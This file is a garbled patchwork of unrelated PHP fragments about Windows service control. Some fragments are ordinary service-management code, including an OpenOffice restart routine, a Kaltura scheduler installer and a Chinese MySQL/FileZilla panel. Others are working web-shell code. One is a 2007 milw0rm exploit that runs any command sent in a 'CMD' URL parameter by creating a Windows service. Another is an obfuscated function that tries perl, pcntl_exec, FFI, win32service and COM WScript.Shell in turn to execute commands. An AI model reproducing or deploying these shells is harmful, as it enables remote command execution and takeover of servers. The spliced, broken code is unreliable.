function srvshelL($command)
{
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while (!file_exists($name)) {
sleep(1);
}
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
// First we check the host:port to see if open office is running
$sCheckOO = SearchHelper::checkOpenOfficeAvailablity();
if (empty($sCheckOO) && !$restartOO) {
// If the check returns empty then it is available on that port so we exit
if ($sGiveOutput) {
echo 1;
}
exit;
}
// Open office appears not to be running or requires a restart
if (OS_WINDOWS) {
$OOService = 'ktopenoffice';
$default->log->debug('Check Open Office Task: ' . get_current_user());
if ($restartOO) {
// If Open office needs to be restarted - stop it here
$result_stop = win32_stop_service($OOService);
// Wait for the service to stop fully before trying to restart it
$continue = false;
$cnt = 0;
while ($continue === false && $cnt < 15) {
$result = win32_query_service_status($OOService);
if (isset($result['ProcessId']) && $result['ProcessId'] != 0) {
// If there is still a process id then the service has not stopped yet.
sleep(2);
$continue = false;
$cnt++;
} else {
$continue = true;
}
}
} else {
function stop()
{
$this->last_error = win32_stop_service($this->name, $this->machine);
return $this->last_error === WIN32_NO_ERROR;
}
}
exit(0);
case 'install':
win32_create_service(array('service' => $serviceName, 'display' => 'Kaltura asynchronous batch jobs scheduler', 'description' => 'Kaltura asynchronous batch jobs scheduler', 'params' => __FILE__ . " run {$phpPath} {$iniDir}", 'path' => $phpPath, 'start_type' => WIN32_SERVICE_AUTO_START, 'error_control' => WIN32_SERVER_ERROR_NORMAL));
KalturaLog::info('Service Installed');
exit(0);
case 'uninstall':
win32_delete_service($serviceName);
KalturaLog::info('Service Removed');
exit(0);
case 'start':
win32_start_service($serviceName);
KalturaLog::info('Service Started');
exit(0);
case 'stop':
win32_stop_service($serviceName);
KalturaLog::info('Service Stopped');
exit(0);
case 'run':
win32_start_service_ctrl_dispatcher($serviceName);
win32_set_service_status(WIN32_SERVICE_RUNNING);
break;
case 'debug':
set_time_limit(10);
break;
default:
KalturaLog::info('Unkown action');
exit(-1);
}
$kscheduler = new KGenericScheduler($phpPath, $iniDir);
while (1) {
### ###
### Note: Tested on 5.2.1 ###
### ###
### Author: NetJackal ###
### Email: nima_501[at]yahoo[dot]com ###
### Website: http://netjackal.by.ru ###
### ###
### ###
### Usage: http://victim.net/nj.php?CMD=[command] ###
#####################################################
$command = isset($_GET['CMD']) ? $_GET['CMD'] : 'dir';
#cammand
$dir = ini_get('upload_tmp_dir');
#Directory to store command's output
if (!extension_loaded('win32service')) {
die('win32service extension not found!');
}
$name = $dir . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
$exec = file_get_contents($name);
unlink($name);
echo "<pre>" . htmlspecialchars($exec) . "</pre>";
?>
# milw0rm.com [2007-07-27]
case '重启':
win32_restart_service($service->item(0)->getElementsByTagName("mysql")->item(0)->nodeValue);
echo '<SCRIPT>alert("MySQL重启命令执行完成")</SCRIPT>';
break;
default:
break;
}
switch ($_POST['filezilla']) {
case '启动':
win32_start_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue);
echo '<SCRIPT>alert("FileZilla启动命令执行完成")</SCRIPT>';
break;
case '停止':
win32_stop_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue);
echo '<SCRIPT>alert("FileZilla停止命令执行完成")</SCRIPT>';
break;
case '重启':
win32_stop_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue);
sleep(5);
win32_start_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue);
echo '<SCRIPT>alert("FileZilla重启命令执行完成")</SCRIPT>';
break;
default:
break;
}
} else {
echo '<hr/>您的服务器没有为PHP安装<b>win32service</b>扩展库,请前往PHP官方站点<a href="http://pecl.php.net/package/win32service">下载安装</a>至php的ext目录当中,并注意要在php.ini中添加<b>extension=php_win32service.dll;</b>语句,最后重新启动nginx生效!<u>注意:请核对好PHP版本</u>';
}
?>
</center></body>
</html>
function z6v($c)
{
global $win, $tempdir;
$r = '';
if (!empty($c)) {
if (!$win) {
if (extension_loaded('perl')) {
@ob_start();
$p = new perl();
$p->eval("system('{$c}')");
$r = @ob_get_contents();
@ob_end_clean();
} elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) {
$r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n';
$o = $tempdir . uniqid('pcntl');
$pid = @pcntl_fork();
if ($pid == -1) {
$r .= '[-] Could not fork. Exit';
} elseif ($pid) {
$r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.';
} else {
$c = array(" -e 'system(\"{$c} > {$o}\")'");
if (@pcntl_exec('/usr/bin/perl', $c)) {
exit(0);
}
if (@pcntl_exec('/usr/local/bin/perl', $c)) {
exit(0);
}
die;
}
$r = z9p($o);
@unlink($o);
}
} else {
$o = $tempdir . uniqid('NJ');
if (extension_loaded('ffi')) {
$a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0);
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} elseif (extension_loaded('win32service')) {
$s = uniqid('NJ');
@win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\""));
@win32_start_service($s);
@win32_stop_service($s);
@win32_delete_service($s);
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} elseif (extension_loaded("win32std")) {
@win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} else {
$a = new COM("WScript.Shell");
$a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
$r = z9p($o);
}
@unlink($o);
}
}
return $r;
}
